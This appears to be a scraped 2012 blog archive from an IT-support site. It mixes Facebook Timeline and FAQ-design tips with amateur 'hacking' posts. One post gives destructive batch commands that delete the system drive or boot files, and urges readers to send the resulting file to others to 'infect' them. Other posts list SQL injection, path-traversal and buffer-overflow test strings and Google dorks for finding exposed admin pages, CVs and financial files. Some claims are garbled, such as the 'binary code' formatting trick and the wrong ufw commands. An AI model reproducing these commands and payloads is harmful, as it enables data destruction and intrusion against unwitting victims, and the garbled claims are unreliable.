Our Vision

To give customers the most compelling IT Support experience possible.

Our Mission

Our mission is simple: make technology an asset for your business not a problem.

Our Values

We strive to make technology integrate seamlessly with your business so your business can grow. As your technology partner, when your business grows ours will grow with you, therefore, we will work hand in hand with you to support your growth.

Our Values

We develop relationship that makes a positive difference in our customers Business.

Our Values

We exibit a strong will to win in the marketplace and in every aspect of our Business

Thursday, January 12, 2012

Facebook Timeline: Quick Tips And Smart Examples

A lot has already been covered about Facebook Timeline. A lot of critics (as expected) have negatively criticized Facebook Timeline while others consider it as the biggest gamble (which seems to be working) by Mark Zuckerberg. I will try not to bore you by discussing the same stuff over and over. Facebook Timeline is here to stay and we can either sit on the sidelines and let Timeline take control of the social world or we can be a part of this new movement.
Though I am a firm believer of swimming-against-the-tide yet, on this rare occasion, I will suggest you to enable Timeline on your Facebook Profiles. It is time that you become accustomed to the new social networking phenomenon.
Facebook Timeline: Quick Tips And Smart Examples
It is easy. Really. Follow the steps below:
Hit this link.Hit the green colored “Get Timeline” button on the bottom bar.Now, hold on. Before your second click I will suggest you go through your Timeline and make whatever changes you want in your timeline.Once you are happy with your Timeline then hit the green colored “Publish Now” button on the top horizontal bar.
Wasn’t that really easy? Have fun with the new Facebook profile and keep reading to make it more attractive.
The new Facebook Timeline looks a bit complex though it actually isn’t. Let me take you through some of the tips that will come in handy when you start using Facebook Timeline.
Click the “Star” button on the top right corner of any item in your Facebook Timeline to expand it horizontally. Once you do so the item stretches across both columns and is easily visible to the viewer. This feature can be used when you want to emphasize soemthing in your Timeline.

You can remove the items that you don’t like from your timeline. Besides deleting the item you can perform various other tasks (like editing the date, adding the location, marking spam and a lot more) with that item as seen in the image below:

You can get rid of the useless adverts that show on the right sidebar of your Facebook Timeline. All that you have to do is hover your mouse pointer on that advert and click the “X” button that becomes visible. Facebook will hide the advert but might ask a quick question which will help them improve their advert service. Be generous and leave your answer.

Just like the older version of Facebook, the timeline has the option to let you see how your timeline will look like to the general public. Just look for the View As option on the top of your timeline and test it out.

Although you will hide most of the useless content from your timeline, there will be times when you want to see everything that is actually part of your activity on Facebook. Look for the “Activity Log” button below your Facebook header image and click on it. You will now see everything that you have been up to on Facebook. You can filter the content by many fields and analyze it as much as you want. Know your activity and improve your social media experience.

Once you are accustomed to Facebook Timeline then it is time for some sort of beautification. Facebook Timeline provides the option to have one large image displayed on the top of your profile which gives your profile a completely new look. No other social networking website gives you the sort of look that the Facebook Timeline has to offer. Let me take you through some of the unique Facebook Timeline Covers that you can use right away on your Facebook Timeline.










I told you how to swim with the tide and be a part of Facebook Timeline phenomenon. I introduced you to some of the tips that can come in handy when you are about to use Facebook Timeline. Lastly, I presented some of the cover images that you can use on your Facebook Timeline. Now, before I wrap up, I will show some of the unique Facebook Timeline ideas that have garnered a lot of attention lately. These people were some of the very first people who successfully experimented with Facebook Timeline profile. Let us begin:

Andrew seems to be obsessed with the old look of Facebook. The obsession pushed him to give the new Facebook Timeline the look of old school Facebook. Pretty innovative I would say.

Mat’s Facebook cover page surely attracts attention when you look at it for the first time.

His Facebook Timeline profile goes with his name. Complex to figure out though simple once you know what it is.

Though there isn’t much that is unique with this Timeline Profile it’s still worth a view.

This is one rare Facebook Timeline profile that makes use of holiday seasons at its best.

Ever saw the Facebook Timeline style 404 error? Here is one for you to enjoy. It was sure that some will come up with a 404 Error page on their Timeline headers but this is pretty much the most different approach towards the 404 error page.

Robert’s Facebook Timeline Cover can easily be tagged as the most confused cover of them all. He still does not know what is on his mind!

Can’t explain anything about this Timeline profile. This has been doing rounds on the Internet due to its approach and it pretty much attracts all.

Another unique approach to Facebook Timeline Cover image.

Didn’t I tell you that QR Code‘s have their own marketing power? Here is another way to use QR code and attract attention.
View the original article here

How To Create An Effective FAQ For Your Website

Frequently Asked Questions is a good section to have in your website. They give users a chance to figure out things by themselves instead of wasting resources (both yours and theirs) with a 1-to-1 conversation (chat, Skype, messenger and so on).

But FAQ’s are a different type of content. Just like search and sitemap, it has its own particularities and things that you can do to improve user experience. You have to keep in mind, for instance, that users don’t go to FAQ pages, you have to lead them there.

Here we’ll see a couple of thoughts about it, good practices, inspiration and tools.
So, let’s rock!

Ok, first thing you need to keep in mind: Users don’t read on the web. They scan the page trying to find main keywords about something that may be important to them (just like 90% of you are doing right now). So use good headlines and questions keywords, avoid clichés and keep them short.
If you can, outline main keywords, like searched terms, or main topics.

For a long time FAQs have been misused, instead of real and relevant content, companies put questions they “wished” users would ask (WAQ, Wished to be Asked Questions).

It’s very important to put users needs first, just cover topics that are really important to them. Otherwise it’ll be just another page trying to hide the solution from them. Which, by the way, won’t solve the problem at all, leading to future problems, like unnecessary support requests, or lost sales.
People don’t go looking for FAQs. It’s not a common workflow thinking “Hey, I need to know about their refund policy.. Let’s go to FAQ”. Sounds strange, huh?

So you have to interlink it wisely in places where users may need help. Like using them along with search pages. Or using them as a “wall” before chat with real attendants: Ask the user what kind of problem they have, then suggest a few FAQ searched items based on the users keywords.

FAQ are great to provide complete answers, but if you just want to tell users how features work, or which type of data they should put in a registration form just go with tooltips or something like that.
Oh, and don’t forget to make it easy and mobile friendly, or in other words, don’t use just a simple hovering element or title attribute. You may use a plugin or add it as a plain text right above your field or button.

I know I’m saying that it’s important, but it has its place in websites. It’s a good idea for sales websites, services, apps… But if you have a simple blog or simple company website, just create an “about” page and you’ll be fine.

Have you ever thought about it? If you have a single page with good keyword density about your product and link it in several places inside your website, it can be a really good landing page.
So, think carefully about it, it may lead a lot of users to your website.

Again, Keep It Simple, Stupid my friend .You don’t need to clarify every single question that may pop up about your product. You may categorize questions (if you have a huge amount of them), show content just when users need it.

Just keep in mind that landing page idea, you have to talk about the most main topics and solve users problems fast, if not they will just leave website.

Like I said above, you may hide content by default and just show it when a user wants/requires it. You can use, for instance, jQuey Collapsible panels plugin and create dynamically collapsible panels. You can also use jQuery accordion plugins.

Another good thing to do, is add a “Table of contents” with smooth scrolling, so users can reach what they want easily and with a pretty cool effect.
You may use smooth scrolling scripts or something like LocalScroll so you’ll get a better organized and easier to use FAQ page.

Well, Matthew Corner wrote a tutorial with smooth scrolling, table of contents and good looking, and you can just download and edit it to better fit your needs.

Although many people use simple headings (h2,h3) for questions and paragraphs for answers, I think that it’s much more semantically correct using definition lists for them. So you may use definition title(s) and definition description(s) to wrap them up accordingly.
Another option, really good one actually, is to use the

HTML5 element, which gives you those good looking collapsible panels by default (with browsers that support it, of course).Paypal uses a really good system where users can see their FAQ or search by keywords, as well.

It pretty common to have users asking you really dumb questions. Don’t get me wrong, but sometimes they could easily find the answer themselves, if we gave them a chance.


Did you know that we have a tool for FAQ development? Pretty cool, huh? It’s called FAQme, and worth trying!

If you’re more of a social company, why not use a tool that integrates questions and people? Well, I’ve seen a couple of (young) companies using FormSpring as a simple way to answer real questions and let them be easily accessed by other clients

View the original article here

Wednesday, January 11, 2012

Types of viruses :-

The different types of viruses are as follows-

1) Boot Sector Virus :- Boot sector viruses infect either the master boot record of the hard disk or the floppy drive. The boot record program responsible for the booting of operating system is replaced by the virus. The virus either copies the master boot program to another part of the hard disk or overwrites it. They infect a computer when it boots up or when it accesses the infected floppy disk in the floppy drive. i.e. Once a system is infected with a boot-sector virus, any non-write-protected disk accessed by this system will become infected.

Examples of boot- sector viruses are Michelangelo and Stoned.


2) File or Program Viruses :- Some files/programs, when executed, load the virus in the memory and perform predefined functions to infect the system. They infect program files with extensions like .EXE, .COM, .BIN, .DRV and .SYS .

Some common file viruses are Sunday, Cascade.

3) Multipartite Viruses :- A multipartite virus is a computer virus that infects multiple different target platforms, and remains recursively infective in each target. It attempts to attack both the boot sector and the executable, or programs, files at the same time. When the virus attaches to the boot sector, it will in turn affect the system’s files, and when the virus attaches to the files, it will in turn infect the boot sector.

This type of virus can re-infect a system over and over again if all parts of the virus are not eradicated.
Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989.
Other examples are Invader, Flip, etc.


4) Stealth Viruses :- These viruses are stealthy in nature means it uses various methods for hiding themselves to avoid detection. They sometimes remove themselves from the memory temporarily to avoid detection by antivirus. They are somewhat difficult to detect. When an antivirus program tries to detect the virus, the stealth virus feeds the antivirus program a clean image of the file or boot sector.

5) Polymorphic Viruses :- Polymorphic viruses have the ability to mutate implying that they change the viral code known as the signature each time they spread or infect. Thus an antivirus program which is scanning for specific virus codes unable to detect it's presense.

6) Macro Viruses :- A macro virus is a computer virus that "infects" a Microsoft Word or similar application and causes a sequence of actions to be performed automatically when the application is started or something else triggers it. Macro viruses tend to be surprising but relatively harmless.A macro virus is often spread as an e-mail virus. Well-known examples are Concept Virus and Melissa Worm.

Run Firefox inside Firefox




How to run Firefox inside Firefox.?





Yup you can run Firefox inside firefox just by typing following url.





How about Opening Firefox inside Firefox which is again in another Firefox..?



Not bad huh?



And its really easy too just type in this url in Firefox's address bar and there you go!



Firefox inside Firefox!





copy paste following url in a web browser (mozilla firefox).





chrome://browser/content/browser.xul







Following is the screenshot of this trick (firefox in firefox in firefox, which is again in another firefox)-

Input Validation Attacks :-

Input Validation Attacks are where an attacker intentionally sends unusual input in the hopes of confusing the application.


The most common input validation attacks are as follows-


1) Buffer Overflow :- Buffer overflow attacks are enabled due to sloppy programming or mismanagement of memory by the application developers. Buffer overflow may be classified into stack overflows, format string overflows, heap overflows and integer overflows. It may possible that an overflow may exist in language’s (php, java, etc.) built-in functions.

To execute a buffer overflow attack, you merely dump as much data as possible into an input field. The attack is said to be successful when it returns an application error. Perl is well suited for conducting this type of attack.

Here’s the buffer test, calling on Perl from the command line:

$ echo –e “GET /login.php?user=\

> `perl –e ‘print “a” x 500’`\nHTTP/1.0\n\n” | \

nc –vv website 80

This sends a string of 500 “a” characters for the user value to the login.php file.

Buffer overflow can be tested by sending repeated requests to the application and recording the server's response.


2) Canonicalization :- These attacks target pages that use template files or otherwise reference alternate files on the web server. The basic form of this attack is to move outside of the web document root in order to access system files, i.e., “../../../../../../../../../boot.ini”. This type of functionality is evident from the URL and is not limited to any one programming language or web server. If the application does not limit the types of files that it is supposed to view, then files outside of the web document root are targeted, something like following-


/menu.asp?dimlDisplayer=menu.asp


/webacc?User.asp=login.htt


/SWEditServlet?station_path=Z&publication_id=2043&template=login.tem

/Getfile.asp?/scripts/Client/login.js


/includes/printable.asp?Link=customers/overview.htm



3) Cross-site Scripting (XSS) :- Cross-site scripting attacks place malicious code, usually JavaScript, in locations where other users see it. Target fields in forms can be addresses, bulletin board comments, etc.

We have found that error pages are often subject to XSS attacks. For example, the URL for a normal application error looks like this:

http://website/inc/errors.asp?Error=Invalid%20password

This displays a custom access denied page that says, “Invalid password”. Seeing a string

on the URL reflected in the page contents is a great indicator of an XSS vulnerability. The attack would be created as:

http://website/inc/errors.asp?Error=
That is, place the script tags on the URL.

4) SQL Injection :- This kind of attack occurs when an attacker uses specially crafted SQL queries as an input, which can open up a database. Online forms such as login prompts, search enquiries, guest books, feedback forms, etc. are specially targeted.
The easiest test for the presence of a SQL injection attack is to append “or+1=1” to the URL and inspect the data returned by the server.
example:- http://www.domain.com/index.asp?querystring=sports' or 1=1--

Shutdown Command Via Command Prompt :-

The 'Shutdown' Command Becomes More Flexible and Automated when used from the Command Prompt.


To Run the 'Shutdown' command from the command prompt, go to 'Start > Run', type 'cmd', and press 'Enter'.

In the black box (the command prompt) type 'Shutdown' and the Switches you want to use with the 'Shutdown' command.

You have to use at least one switch for the shutdown command to work.


The Switches :- The 'Shutdown' command has a few options called Switches. You can always see them by typing 'shutdown -?' in the command prompt if you forget any of them.

-i: Display GUI interface, must be the first option


-l: Log off (cannot be used with -m option)


-s: Shutdown the computer

-r: Shutdown and restart the computer

-a: Abort a system shutdown


-m \\computername: Remote computer to shutdown/restart/abort


-t xx: Set timeout for shutdown to xx seconds


-c “comment”: Shutdown comment (maximum of 127 characters)

-f: Forces running applications to close without warning


-d [u][p]:xx:yy: The reason code for the shutdown u is the user code p is a planned shutdown code xx is the major reason code (positive integer less than 256) yy is the minor reason code (positive integer less than 65536)



Note :- I’ve noticed using a switch with a '-' sign doesn’t work sometimes.

If you are having trouble try using a '/' in place of '-' in your switches.

Examples :- shutdown –m \\computername –r –f


This command will restart the computer named computername and force any programs that might still be running to stop.

shutdown –m \\computername –r –f –c “I’m restarting your computer. Please save your work now.” –t 120

This command will restart the computer named computername, force any programs that might still be running to stop, give to user on that computer a message, and countdown 120 seconds before it restarts.


shutdown –m \\computername –a


This command will abort a previous shutdown command that is in progress.

Using A Batch File :-


You can create a file that performs the shutdown command on many computers at one time. In this example I’m going to create a batch file that will use the shutdown command to shut down 3 computers on my home network before I go to bed.

Open 'Notepad' and type the shutdown command to shut down a computer for each computer on the network.


Make sure each shutdown command is on its own line.

An example of what should be typed in notepad is given below-

shutdown –m \\computer1 –s


shutdown –m \\computer2 –s

shutdown –m \\computer3 -s

Now I’ll save it as a batch file by going to file, save as, change save as type to all files, give the file a name ending with '.bat'. I named mine 'shutdown.bat'.

Pick the location to save the batch file in and save it.

When you run the batch file it’ll shutdown computer 1, 2, and 3 for you.


You can use any combination of shutdown commands in a batch file.

Tuesday, January 10, 2012

Tips for Wireless Home Network Security


1) Change Default Administrator Passwords (and Usernames)


2) Turn on (Compatible) WPA / WEP Encryption


3) Change the Default SSID


4) Disable SSID Broadcast


5) Assign Static IP Addresses to Devices


6) Enable MAC Address Filtering


7) Turn Off the Network During Extended Periods of Non-Use


8) Position the Router or Access Point Safely

Monday, January 9, 2012

Google Hacking :-

Basic Operators:-
1) And (+) :- This operator is used to include multiple terms in a query which is to be searched in google.
example:- if we type "hacker+yahoo+science" in google search box and click search, it will reveal the results something which are related to all the three words simultaneously i.e. hacker, yahoo and science.

2 ) OR (|) :- The OR operator, represented by symbol( | ) or simply the word OR in uppercase letters, instructs google to locate either one term or another term in a query.

3) NOT :- It is opposite of AND operator, a NOT operator excludes a word from search.
example:- If we want to search websites containing the terms google and hacking but not security then we enter the query like "google+hacking" NOT "security".


Advanced Operators:-
1) Intitle :- This operator searches within the title tags.
examples:- intitle:hacking returns all pages that have the string "hacking" in their title.

intitle:"index of" returns all pages that have string "index of" in their title.

Companion operator:- "allintitle".

2) Inurl :- Returns all matches, where url of the pages contains given word.
example:- inurl:admin returns all matches, where url of searched pages must contains the word "admin".

Companion operator:- "allinurl".

3) Site :- This operator narrows search to specific website. It will search results only from given domain. Can be used to carry out information gathering on specific domain.
example:- site:www.microsoft.com will find results only from the domain www.microsoft.com

4) Link :- This operator allows you to search for pages that links to given website.
example:- link:www.microsoft.com
Here, each of the searched result contains asp links to www.microsoft.com

5) Info :- This operator shows summary information for a site and provides links to other google searches that might pertain to that site.
example:- info:www.yahoo.com

6) Define :- This operator shows definition for any term.
example:- define:security
It gives various definitions for the word "security" in different manner from all over the world.

7) Filetype :- This operator allows us to search specific files on the internet. The supported file types can be pdf, xls, ppt, doc, txt, asp, swf, rtf, etc..
example:- If you want to search for all text documents presented on domain www.microsoft.com then we enter the query something like following.
"inurl:www.microsoft.com filetype:txt"


POPULAR SEARCH:
Google Search :- "Active Webcam Page" inurl:8080 Description- Active WebCam is a shareware program for capturing and sharing the video streams from a lot of video devices. Known bugs: directory traversal and cross site scripting.

Google Search :- "delete entries" inurl:admin/delete.asp Description- AspJar contains a flaw that may allow a malicious user to delete arbitrary messages. The issue is triggered when the authentication method is bypassed and /admin/delete.asp is accessed directly. It is possible that the flaw may allow a malicious user to delete messages resulting in a loss of integrity.

Google Search :- "phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
Description- This search gives hundreds of existing curriculum vitae with names and address. An attacker could steal identity if there is an SSN in the document.

Google Search :- intitle:"index of" finance.xls Description- Secret financial spreadsheets 'finance.xls' or 'finances.xls' of companies may revealed by this query.

Google Search :- intitle:"index.of" robots.txt Description- The robots.txt file contains "rules" about where web spiders are allowed (and NOT allowed) to look in a website's directory structure. Without over-complicating things, this means that the robots.txt file gives a mini-roadmap of what's somewhat public and what's considered more private on a web site. Have a look at the robots.txt file itself, it contains interesting stuff. However, don't forget to check out the other files in these directories since they are usually at the top directory level of the web server!

Google Search :- intitle:index.of.admin Description- Locate "admin" directories that are accessible from directory listings.

Google Search :- inurl:"nph-proxy.cgi" "start browsing" Description- Returns lots of proxy servers that protects your identity online.

-: Folder Lock Without Any Software :-



Folder Lock With Password Without Any Software-


Paste the code given below in notepad and 'Save' it as batch file (with extension '.bat').

Any name will do.

Then you see a batch file. Double click on this batch file to create a folder locker.

New folder named 'Locker' would be formed at the same location.

Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder namely 'Locker'.

If you want to unlock your files,double click the batch file again and you would be prompted for password.

Enter the password and enjoy access to the folder.


if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK



if NOT EXIST Locker goto MDLOCKER



:CONFIRM



echo Are you sure u want to Lock the folder(Y/N)



set/p "cho=>"



if %cho%==Y goto LOCK



if %cho%==y goto LOCK



if %cho%==n goto END



if %cho%==N goto END



echo Invalid choice.



goto CONFIRM



:LOCK



ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"



attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"



echo Folder locked



goto End



:UNLOCK



echo Enter password to Unlock folder



set/p "pass=>"



if NOT %pass%==type your password here goto FAIL



attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"



ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker



echo Folder Unlocked successfully



goto End



:FAIL



echo Invalid password



goto end



:MDLOCKER



md Locker



echo Locker created successfully

Sunday, January 8, 2012

If you think that Notepad is useless ???

If you think that Notepad is useless then you are wrong because you can now do a lot of things with the Notepad which you could have never imagined. In this hack I will show you how to format a HDD using Notepad. This is really cool.

Step 1 :-
Copy The Following In Notepad Exactly as it is.

says01001011000111110010010101010101010000011111100000


Step 2 :- Save As An EXE Any Name Will Do


Step 3 :- Send the EXE to People And Infect

OR

IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code

format c:\ /Q/X — this will format your drive c:\


01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000

format d:\ /Q/X — this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000

format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001

try to figure out urself rest

cant spoonfeed

its working

Do not try it on your PC. Don’t mess around this is for educational purpose only

still if you cant figure it out try this go to notepad and type the following:

@Echo off

Del C:\ *.*|y

save it as Dell.bat

want worse then type the following:

@echo off

del %systemdrive%\*.*/f/s/q

shutdown -r -f -t 00

and save it as a .bat file

Firewalls are your guardian angels.

First of all, keep a software firewall active on your system, and restrict access to ports that allow remote access into your system, a good idea is to allow only a few select hosts access to ports used by services such as ssh (port 22) or telnet (port 23). Keeping a firewall in place ensures that you alone dictate who gets to access remote services on your computer and who doesn’t. To set up a firewall in linux, you can use the iptables program which comes standard with most linux distributions. However, iptables is quite difficult and complicated to set up correctly, and you will need to spend some time fiddling with the command line, but it is very flexible and powerful once configured correctly.

If messing about with iptables dosen’t appeal to you, there are frontends to iptables that you can use to set up effective firewalls. One such frontend is ufw (uncomplicated firewall) this program comes standard on ubuntu and is quite simple to set up, to use it you first have to enable it by typing in ’sudo enable ufw’ in the terminal, once the ufw service is active, adding rules is as simple as ’sudo allow 22/tcp’ > this statement allows all tcp traffic on port 22, swap allow for deny and you have the ssh service blocked, Its that simple, much easier than mucking about with iptables.

Of course, there are many people who do not like the idea of using command-line programs and like all their apps to be graphical. If you prefer a GUI configured firewall, then firestarter is the choice for you. Firestarter is a breeze to use, and has good documentation available on the firestarter website.


2) Passwords are for your protection, choose them well

Choose good user passwords, especially for root. One way to choose a secure password is to take a sentence, reduce it to an acronym and then replace some letters of the acronym with symbols and add some numbers to it. this mixing of alphabets, numbers and symbols, along with its long length will be a strong password.

Never use actual words that have meaning as passwords. These types of passwords are weak and can be cracked using dictionary attacks. Also along those lines: Never use words that hold personal significance with you.. i.e don’t use passwords that people who know you will be inclined to think that you would use, like a favorite pet’s name.. etc.

And for god’s sake, don’t use the word ‘password’ as a password…. ( don’t laugh… thats one of the most common passwords .. )


3) Use antivirus

Yeaps you read right.. antivirus. Antivirus on linux you say? Yes, linux has antivirus suites as well , but this is more for cleaning off your thumbdrives that you may have used in an infected windows machine than for killing linux viruses, as the system of user permissions for executing files makes linux a very inhospitable place for computer viruses to live. clamAV is a good antivirus choice, with a GUI version available for most major distros.


4) Be careful what scripts you get off the net
Getting bash scripts off the net is convenient, but be careful what scripts you run on your system, and make sure you check them out first. If you suspect that a script you got has some nasty intentions behind it, but you do not have the expertise in bash scripting to be sure, post the script in text form on linux support forums and the community will help you out. Unfortunatly, there are idiots out there who write destructive shell scripts and release them into the wilds of the internet, in this case intuition is your best defence.

5) Encrypt sensitive data that you may have.
The concept behind encryption is relatively simple, make the data to be encrypted unreadable to anybody besides authorised users.

My favourite program for encrypting data on linux AND windows would have to be truecrypt. Truecrypt works by creating a virtual volume which you can then set a passphrase or security key to. When you mount the virtual volume, you can then add files to it, which will be totally encrypted and unviewable once unmounted. The only way to mount the drive is to supply the passphrase or key.

6)Keep your BIOS set to boot from your harddrive and then add a password to your bios.

This is to keep people from booting off from live CDs and cracking your password from them. Although it is relatively easy to reset the BIOS password, this should be at least a minor detterance to those who may try this cracking method.

Well, there you go.. hopefully you wil use these tips and make your system a safer box to work on.

Password Hacking :-


Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.

Most passwords can be cracked by using following techniques :


1) Hashing :- Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.

If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even 'well-chosen' passwords.

One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length.

LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.

Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.

2) Guessing :- Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user's personal information.

Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:

* blank (none)
* the word "password", "passcode", "admin" and their derivatives
* the user's name or login name
* the name of their significant other or another person (loved one)
* their birthplace or date of birth
* a pet's name
* a dictionary word in any language
* automobile licence plate number
* a row of letters from a standard keyboard layout (eg, the qwerty keyboard -- qwerty itself, asdf, or qwertyuiop)
* a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters.
and so on....

In one survery of Facebook and MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit; two-thirds of the time that digit was.

A password containing both uppercase & lowercase characters, numbers and special characters too; is a strong password and can never be guessed.

Check Your Password Strength

3) Default Passwords :- A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during development stages of software. There are lots of applications running on the internet on which default passwords are enabled. So, it is quite easy for an attacker to enter default password and gain access to sensitive information. A list containing default passwords of some of the most popular applications is available on the internet.

Always disable or change the applications' (both online and offline) default username-password pairs.

4) Brute Force :- If all other techniques failed, then attackers uses brute force password cracking technique. Here an automatic tool is used which tries all possible combinations of available keys on the keyboard. As soon as correct password is reached it displays on the screen.This techniques takes extremely long time to complete, but password will surely cracked.

Long is the password, large is the time taken to brute force it.

5) Phishing :- This is the most effective and easily executable password cracking technique which is generally used to crack the passwords of e-mail accounts, and all those accounts where secret information or sensitive personal information is stored by user such as social networking websites, matrimonial websites, etc.

Phishing is a technique in which the attacker creates the fake login screen and send it to the victim, hoping that the victim gets fooled into entering the account username and password. As soon as victim click on "enter" or "login" login button this information reaches to the attacker using scripts or online form processors while the user(victim) is redirected to home page of e-mail service provider.

Never give reply to the messages which are demanding for your username-password, urging to be e-mail service provider.

It is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of Self-service password reset) and compromising host security.

However, cracking usually designates a guessing attack.

Twitter Facebook Favorites More